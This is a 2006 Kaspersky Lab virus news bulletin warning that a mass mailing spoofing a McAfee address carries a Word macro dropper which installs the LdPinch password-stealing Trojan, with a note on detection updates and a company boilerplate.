Malicious mass mailing sent using McAfee email address

02 Nov 2006
Virus News

Kaspersky Lab has intercepted a mass-mailing containing Trojan-Dropper.MSWord.Lafool.v. This mass mailing is unusual as messages appear to be sent from mcafee@europe.com and allegedly originated from McAfee, an antivirus company. Kaspersky Lab believes that McAfee is in no way involved in the distribution of this Trojan and that the email address used in the messages (mcafee@europe.com) is faked and used in order to cause recipients to open infected messages.

Lafool.v is a Word document called “McAfee Inc. Reports.doc”. The file is 80,635 bytes in size, and allegedly contains a report about the propagation of malicious programs on the Internet. The document contains a macro written in Visual Basic for Applications. Lafool.v extracts a new modification of LdPinch, a well known Trojan password stealing program, from itself, and launches it for execution. LdPinch steals passwords to a number of services and applications, including AOL Instant Messenger and ICQ, and other confidential user data. Kaspersky Anti-Virus detects the new variant of this program as Trojan-PSW.Win32.LdPinch.bbg.

The Kaspersky Anti-Virus 6.0 and Kaspersky Internet Security Proactive Defense module will block the Trojan, including its attempts to:

  • execute a suspicious macro command
  • harvest personal data
  • start the Internet browser with command line parameters
  • send harvested data via the browser without the user’s knowledge

The Trojan’s activity is blocked if the user blocks at least one of these actions (LdPinch will either fail to start or will be unable to carry out its malicious payload. It should be noted that this technology for sending data without the user’s knowledge was first implemented in the well-publicized PC Flank Leaktest (http://www.pcflank.com/pcflankleaktest.htm).

An antivirus database update containing detection for Lafool.v was released on October 31st, 2006. Users of Kaspersky Anti-Virus who are not utilizing automatic updates are recommended to update their antivirus databases.

For additional information, please visit Trojan-Dropper.MSWord.Lafool.v on viruslist.com.

About Kaspersky Lab

Kaspersky Lab is the largest antivirus company in Europe. It delivers some of the world’s most immediate protection against IT security threats, including viruses, spyware, crimeware, hackers, phishing, and spam. The Company is ranked among the world’s top four vendors of security solutions for endpoint users. Kaspersky Lab products provide superior detection rates and one of the industry’s fastest outbreak response times for home users, SMBs, large enterprises and the mobile computing environment. Kaspersky® technology is also used worldwide inside the products and services of the industry’s leading IT security solution providers. Learn more at www.kaspersky.com. For the latest on antivirus, anti-spyware, anti-spam and other IT security issues and trends, visit www.viruslist.com.